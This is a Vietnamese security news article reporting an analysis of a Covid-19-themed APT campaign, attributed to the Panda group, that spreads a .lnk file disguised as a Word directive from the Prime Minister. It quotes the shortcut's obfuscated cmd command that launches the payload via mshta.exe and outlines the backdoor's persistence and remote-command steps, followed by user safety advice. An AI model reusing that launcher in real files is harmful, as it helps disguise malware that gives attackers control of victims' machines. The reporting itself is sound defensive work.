Trong thời gian gần đây, do diễn biến của dịch Covid-19 khá phức tạp, nhiều nhóm tin tặc đã lợi dụng để thực hiện các chiến dịch tấn công có chủ đích nhằm vào các tổ chức trên thế giới, trong đó có cả ở Việt Nam.
Mục tiêu của tệp tin độc hại
Theo báo cáo phân tích của CMC Cyber Security, mẫu mã độc mới này được phát tán qua email giả dạng thông báo của Thủ tướng về dịch Covid-19. Mẫu mã độc được phát hiện giống với một số mẫu do nhóm tin tặc Panda phát triển, chèn trong một tệp tin word có tiêu đề “Chi Thi cua Thu tuong nguyen xuan phuc”. Tệp tin có dạng shortcut với phần mở rộng là “.lnk” được ẩn dưới dạng winword nhằm đánh lừa người dùng, do đuôi “.lnk” sẽ được hệ điều hành Windows ẩn đi.
Tuy nhiên, tệp tin winword này sử dụng một mục tiêu đáng ngờ. Thông thường, mục tiêu của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng tệp tin độc hại này lại chứa đoạn mã lệnh có dạng: “%comspec% /c for %x in (%temp%=%cd%) do for /f “delims==” %i in (‘dir “%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk” /s /b’) do start m%windir:~-1,1%hta.exe “%i”.
Qua phân tích, các chuyên gia CMC Cyber Security cho biết, sau khi lừa người dùng tải về, mã độc sẽ lần lượt thực hiện các bước:
Bước 1: Tạo bản sao của 3 tệp tin thực thi vào thư mục profile của user hoặc AllUserProfile nếu có đủ quyền Administrator.
Bước 2: Thêm vào khóa autorun để tự kích hoạt tệp tin thực thi vừa tạo khi khởi động lại máy tính.
Bước 3: Mã độc tạo mutex, kết nối đến máy chủ để nhận lệnh.
Bước 4: Mã độc tạo cửa hậu cho phép kẻ tấn công thực thi lệnh từ xa. Khi đó, mã độc có thể thực hiện nhiều lệnh thực thi khác nhau, bao gồm: upload, list folder, read file, lấy cắp thông tin máy tính, người dùng…
“Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng, người đứng sau phát triển mã độc này đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp. APT là một loại tấn công nguy hiểm, được đầu tư kỹ lưỡng nhằm đánh cắp các thông tin quan trọng và gây nhiều thiệt hại cho tổ chức. Để phòng ngừa các cuộc tấn công APT, người dùng luôn phải chuẩn bị các phương án đề phòng và giám sát liên tục mới có thể đảm bảo tính an toàn cho hệ thống của người dùng cũng như cả tổ chức”, chuyên gia bảo mật CMC Cyber Security nhấn mạnh.
Để không bị hacker lừa phát tán mã độc trong bối cảnh tin giả về dịch Covid-19 đang xuất hiện tràn lan trên mạng như hiện nay, người dùng cần nâng cao cảnh giác, chỉ đọc các thông tin từ nguồn chính thống của Bộ Y tế, Chính phủ; không mở email hay click vào link lạ; không mở các file được gửi từ nguồn không rõ ràng; thường xuyên cập nhật các bản vá bảo mật cho thiết bị cá nhân và không chia sẻ các thông tin không chính thống trên mạng xã hội.
Trường hợp bắt buộc phải tải tệp tin về nhưng phát hiện nghi ngờ về nội dung hoặc người gửi, người dùng cần chuyển tiếp email đó vào một email tạm thời khác và dùng một máy tính tách biệt với mạng đang làm việc để mở file, hoặc chuyển tiếp cho quản trị hệ thống. Nếu nắm sâu về kĩ thuật hơn nữa thì có thể thử mở các file nghi ngờ tại các môi trường an toàn hơn (như máy ảo).
Tuệ Minh
10:00 | 19/02/2020
15:00 | 23/03/2020
09:00 | 23/03/2020
09:00 | 12/11/2021
10:00 | 27/03/2020
09:00 | 25/03/2020
14:00 | 10/02/2020
13:00 | 23/11/2020
13:00 | 03/02/2020
08:00 | 26/03/2020
16:00 | 27/03/2020
10:00 | 14/04/2020
20:00 | 31/08/2024
Ngày 23/8, tại TP. Hồ Chí Minh, Cục An toàn thông tin – Bộ Thông tin và Truyền thông, Sở Thông tin và Truyền thông Tp. Hồ Chí Minh và Hiệp hội An toàn Thông tin Việt Nam – Chi hội phía Nam (VNISA phía Nam) phối hợp đồng tổ chức Hội thảo và Triển lãm An toàn thông tin khu vực phía Nam 2024 với chủ đề “Đảm bảo an toàn thông tin cho hạ tầng số, dữ liệu số và kinh tế số trước tội phạm mạng”.
08:00 | 12/08/2024
Ngày 12/8/2004, Bộ trưởng, Chủ nhiệm Văn phòng Chính phủ đã ký Quyết định ban hành quy chế quan hệ quốc tế của ngành Cơ yếu Việt Nam.
10:00 | 31/07/2024
Ngày 25/7/2024, Trung tâm nâng cao năng lực an ninh mạng ASEAN - Nhật Bản (ASEAN - Japan Cybersecurity Capacity Building Centre, viết tắt là AJCCBC) phối hợp với Cơ quan an ninh mạng quốc gia Thái Lan tổ chức cuộc thi Sinh viên với an toàn thông tin ASEAN. Trong đó, các thí sinh tham gia đến từ Việt Nam đã đạt giành 7 vị trí dẫn đầu cuộc thi.
15:00 | 15/07/2024
Theo thông tin từ Bộ Công an, 5 tháng đầu năm nay, thiệt hại do tội phạm lừa đảo chiếm đoạt tài sản đã lên tới hơn 4.000 tỷ đồng, tức là bằng 94% so với cả năm 2023. Qua điều tra, Bộ Công an đã phát hiện những nhóm lừa đảo hoạt động chuyên nghiệp như một nghề để kiếm sống, chuyên nghiên cứu các chính sách mới để từ đó cho ra các kịch bản lừa đảo.
Ngày 05/9, tại Hà Nội, Cục An toàn thông tin (ATTT) thuộc Bộ TT&TT tổ chức Lễ kỷ niệm 10 năm thành lập (9/9/2014 - 9/9/2024). Tại buổi lễ, Bộ trưởng Bộ TT&TT Nguyễn Mạnh Hùng nhấn mạnh, ngoài vũ khí số, yêu cầu Cục ATTT phải có binh pháp số. Cục ATTT cần xây dựng cho mình một binh pháp trên không gian mạng.
08:00 | 06/09/2024
Trong Chương trình nghệ thuật "Vinh quang thầm lặng 2024", ca khúc Mật mã Pha Long của Nhạc sĩ Trương Quý Hải đã chạm đến trái tim của hàng triệu người. Qua những giai điệu sâu lắng, chúng ta càng thêm trân trọng sự hy sinh thầm lặng của những người lính Cơ yếu, những anh hùng đã góp phần viết nên những trang sử vàng cho dân tộc.
14:00 | 06/09/2024
Google chính thức giới thiệu hai tính năng Gemini mới cho Gmail, tích hợp trí tuệ nhân tạo (AI) để hỗ trợ người dùng viết và chỉnh sửa email, cải thiện hiệu suất và chất lượng công việc.
11:00 | 03/09/2024